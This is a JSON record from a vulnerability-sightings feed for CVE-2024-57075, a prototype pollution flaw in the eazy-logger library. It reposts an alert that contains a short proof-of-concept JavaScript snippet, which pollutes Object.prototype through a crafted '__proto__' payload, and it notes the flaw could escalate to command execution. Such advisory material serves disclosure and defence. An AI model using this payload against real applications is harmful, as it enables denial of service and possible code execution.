{"vulnerability": "CVE-2024-57075", "sightings": [{"uuid": "ac133d8a-c9c6-4398-b385-7ab7bb13f617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-57075", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3796", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-57075\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A prototype pollution in the lib.Logger function of eazy-logger v4.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.\n\nAn attacker can supply a payload with `Object.prototype` setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., `child_process.exec`, `eval`), it could enable an attacker to execute arbitrary commands within the application's context.\n\n## Proof of Concept\n\n```js\n(async () =&gt; {\nconst lib = await import('eazy-logger');\nvar someObj = {}\nconsole.log(\"Before Attack: \", JSON.stringify({}.__proto__));\ntry {\n// for multiple functions, uncomment only one for each execution.\nlib.Logger (JSON.parse('{\"__proto__\":{\"pollutedKey\":123}}'))\n} catch (e) { }\nconsole.log(\"After Attack: \", JSON.stringify({}.__proto__));\ndelete Object.prototype.pollutedKey;\n})();\n```\n\ud83d\udccf Published: 2025-02-06T06:31:26Z\n\ud83d\udccf Modified: 2025-02-07T14:34:53Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-57075\n2. https://gist.github.com/tariqhawis/c601f7f85146510ca899a7406a03aba5\n3. https://github.com/shakyShane/eazy-logger", "creation_timestamp": "2025-02-07T15:02:10.000000Z"}, {"uuid": "fb8dba5c-ec78-46ab-9e6a-ef0f2935f4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-57075", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhhlxm7vmt2n", "content": "", "creation_timestamp": "2025-02-05T22:16:48.071296Z"}]}